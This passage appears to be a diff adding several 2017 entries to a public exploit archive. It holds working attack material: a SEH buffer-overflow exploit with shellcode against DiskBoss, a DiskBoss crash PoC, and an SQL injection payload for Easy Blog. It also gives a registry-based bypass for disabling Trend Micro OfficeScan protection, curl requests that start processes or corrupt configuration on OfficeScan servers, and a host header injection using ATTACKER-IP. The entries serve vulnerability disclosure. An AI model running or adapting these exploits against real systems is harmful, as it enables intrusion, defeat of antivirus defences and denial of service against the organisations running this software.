+web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
+
+
+
+Vulnerability Type:
+===================
+Host Header Injection
+
+
+
+CVE Reference:
+==============
+CVE-2017-14087
+
+
+
+Security Issue:
+================
+Host header injection issue as "db_controller.php" relies on $_SERVER['HTTP_HOST'] which can be spoofed by client, instead of $_SERVER['SERVER_NAME'].
+In environments where caching is in place by making HTTP GET request with a poisoned HOST header webpages can potentially render arbitrary
+links that point to a malicious website.
+
+
+Exploit/POC:
+=============
+
+c:\> CURL http://x.x.x.x -H "Host: ATTACKER-IP"
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+
+Severity:
+=========
+Medium
+
+
+
+Disclosure Timeline:
+==================================
+Vendor Notification:  June 2, 2017
+Vendor releases fixes / advisory : September 27, 2017
+September 28, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

platforms/php/webapps/42919.txt

@@ -0,0 +1,37 @@
+# Exploit Title: Easy Blog PHP Script v1.3a - SQL Injection
+# Date: 2017-09-27
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://www.codester.com/
+# Software Link: https://www.codester.com/items/4616/easy-blog-php-script
+# Version: 1.3a
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-09-27
+
+Product & Service Introduction:
+===============================
+A simple and easy to setup script that allows you to have your own basic blog that comes packed with professional features.
+
+Technical Details & Description:
+================================
+
+SQL injection on [id] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+http://localhost/[path]/article.php?id=8' AND 7160=7160 AND 'cbgz'='cbgz
+
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: id=8' AND 7160=7160 AND 'cbgz'='cbgz
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]

platforms/windows/dos/42917.py

@@ -0,0 +1,32 @@
+#!/usr/bin/python
+
+#========================================================================================================================
+# Exploit Author: Touhid M.Shaikh
+# Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer Overflow(PoC)
+# Date: 28-09-2017
+# Website: www.touhidshaikh.com
+# Vulnerable Software: DiskBoss Enterprise v8.4.16
+# Vendor Homepage: http://www.diskboss.com
+# Version: v8.4.16
+# Software Link: http://www.diskboss.com/downloads.html
+# Tested On: Windows 7 x86
+#
+#
+# To reproduce the exploit:
+#   1. Click Server
+#   2. Click Connect
+#   3. In the "Share Name" field, paste the content of buffer.txt , And try
+to connect.........BOOoom....
+#
+#========================================================================================================================
+
+
+junk = "A"*1312
+
+EIP = "B"*4 #EIP overwritten
+
+b = junk+EIP+"D"*500
+
+f = open('buffer.txt','w')
+f.write(b)
+f.close()

platforms/windows/local/42890.txt

@@ -0,0 +1,113 @@
+[+] Credits: John Page (aka hyp3rlinx)	
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-IMAGE-FILE-EXECUTION-BYPASS.txt
+[+] ISR: ApparitionSec            
+ 
+
+
+Vendor:
+==================
+www.trendmicro.com
+
+
+
+Product:
+========
+OfficeScan 
+v11.0 and XG (12.0)*
+
+
+OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
+An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
+manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
+web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
+
+
+Vulnerability Type:
+===================
+Image File Execution Bypass
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Security Issue:
+================
+OfficeScan XG "Unauthorized Change Prevention Service" is a Local SYSTEM service that is supposed to protect OfficeScan processes
+like "PccNTMon.exe" from being terminated, and also prevents unauthorized arbitrary registry settings being made to the protected
+machine even by an Administrator.
+
+However, we can easily bypass by exploiting Windows Image File Execution Options (IFEO) to hijack the service process.
+IFEO has been used by malwares for some time to prevent process from running or execute a process of an attackers choosing in
+place of the process the user expects.
+
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
+
+All an attacker needs to do is create a registry key in IFEO with the same name as "TMBMSRV.exe" which is used by the
+"Trend Micro Unauthorized Change Prevention Service" SYSTEM service. After creating this registry key we create a "string value"
+named debugger pointing to say "calc.exe", we wait and once system reboots BOOM!
+
+
+References:
+===========
+https://success.trendmicro.com/solution/1118372
+
+
+
+Exploit/POC:
+=============
+
+Reproduction:
+
+1) Open registry 
+
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
+
+2) Create a new Key with no name
+
+3) Create a new string value under the new key named "debugger" with value of c:\Windows\system32\calc.exe
+
+4) Rename the created key to TMBMSRV.exe 
+
+5) Reboot system
+
+Done!
+
+We can then not only Kill TM but write to TrendMicro whitelist key in the registry for our evil binary to be left alone in peace.
+
+
+
+Network Access:
+===============
+Local
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+=================================
+Vendor Notification: June 28, 2017
+Vendor Reply: "Officescan Build 1222 which is affected by this bug was already pulled and is no longer available for public download"
+Vendor Reply: "created hotfixes for product improvement."
+September 28, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

platforms/windows/local/42918.py

@@ -0,0 +1,68 @@
+#!/usr/bin/python
+
+#========================================================================================================================
+# Exploit Author: Touhid M.Shaikh
+# Exploit Title: DiskBoss Enterprise v8.4.16 "Import Command" Buffer
+Overflow
+# Date: 29-09-2017
+# Website: www.touhidshaikh.com
+# Contact: https://github.com/touhidshaikh
+# Vulnerable Software: DiskBoss Enterprise v8.4.16
+# Vendor Homepage: http://www.diskboss.com
+# Version: v8.4.16
+# Software Link: http://www.diskboss.com/downloads.html
+# Tested On: Windows 7 x86
+#
+#
+# To reproduce the exploit:
+#   1. right Click, click on Import Command
+#   2. select evil.xml , Booom Calc POPED up.. ;)
+#========================================================================================================================
+
+
+import os,struct
+import sys
+
+#offset to eip
+junk = "A" * (1560)
+
+#JMP ESP (QtGui4.dll)
+jmp1 = struct.pack('<L',0x651bb77a)
+
+#NOPS
+nops = "\x90"
+
+#LEA   EAX, [ESP+76]
+esp = "\x8D\x44\x24\x4c"
+
+#JMP ESP
+jmp2 = "\xFF\xE0"
+
+#Jump short 5
+nseh = "\x90\x90\xEB\x05"
+
+#POP POP RET
+seh = struct.pack('<L',0x6501DE41)
+
+#CALC.EXE pop shellcode
+shellcode =
+"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
+
+
+# FINAL PAYLOAD
+buf = junk + jmp1 + nops * 16 + esp + jmp2 + nops * 90 + nseh + seh + nops
+* 10 + shellcode
+
+
+#FILE
+file='<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + buf +
+'\n</classify>'
+
+
+f = open('evil.xml', 'w')
+f.write(file)
+f.close()
+
+#GREETZ ----------
+#Taushif(Brother)
+#-----------------

platforms/windows/webapps/42892.txt

@@ -0,0 +1,135 @@
+[+] Credits: John Page (aka hyp3rlinx)	
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/CVE-2017-14086-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-START-REMOTE-PROCESS-CODE-EXECUTION-MEM-CORRUPT.txt
+[+] ISR: ApparitionSec            
+ 
+
+
+Vendor:
+==================
+www.trendmicro.com
+
+
+
+Product:
+========
+OfficeScan XG
+v11.0 and (12.0)*
+
+
+
+Vulnerability Type:
+===================
+Unauthorized Start Remote Process Code Execution
+Unauthorized Denial Of Service - INI Corruption
+
+OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
+An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
+manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
+web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
+
+
+
+CVE Reference:
+==============
+CVE-2017-14086
+
+
+
+Security Issue:
+================
+Remote unauthenticated attackers who connect to the OfficeScan XG application can temporarily start the "fcgiOfcDDA.exe" executable
+this process will run for short time before dies, server disk space may also be consumed with dump files by making continous HTTP requests.
+
+
+References:
+===========
+https://success.trendmicro.com/solution/1118372
+
+
+
+Exploit/POC Start Remote Process Code Execution:
+================================================
+c:\> curl -k  https://VICTIM-IP:4343/officescan/console/CGI/ 
+
+HTTP response:
+403 - Forbidden: Access is denied.
+You do not have permission to view this directory or page using the credentials that you supplied
+
+But, we can access it directly :)
+
+c:\> curl -v -k  https://VICTIM-IP:4343/officescan/console/CGI/fcgiOfcDDA.exe
+
+HTTP Response:
+
+500 - Internal server error.
+There is a problem with the resource you are looking for, and it cannot be displayed.
+
+The EXE is called then runs for short time before .DMP is generated.
+
+fcgiOfcDDA.exe.6808.dmp
+
+The stored exception information can be accessed via .ecxr.
+(568.112c): Unknown exception - code c000000d (first/second chance not available)
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for kernel32.dll - 
+eax=00000000 ebx=0014f780 ecx=00000000 edx=00000000 esi=00000002 edi=00000000
+eip=77d9016d esp=0014f730 ebp=0014f7cc iopl=0         nv up ei pl zr na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
+ntdll!NtWaitForMultipleObjects+0x15:
+
+
+
+Exploit/POC (Denial Of Service / INI Corruption):
+==================================================
+[root@localhost /]# curl -v -k  https://VICTIM-IP:4343/officescan/CGI/cgiRqUpd.exe
+* About to connect() to VICTIM-IP port 4343
+*   Trying VICTIM-IP.. connected
+
+
+<HTTP/1.1 200 OK
+< Pragma: no-cache
+< Content-Type: text/plain;charset=iso-8859-1
+< Server: Microsoft-IIS/7.5
+< X-Powered-By: ASP.NET
+< Date: Fri, 02 Jun 2017 18:00:36 GMT
+< Connection: close
+< Content-Length: 22
+
+[INI_UPDATE_SECTION]
+
+
+BOOOM!
+
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: June 2, 2017
+Vendor releases fixes / advisory : September 27, 2017
+September 28, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx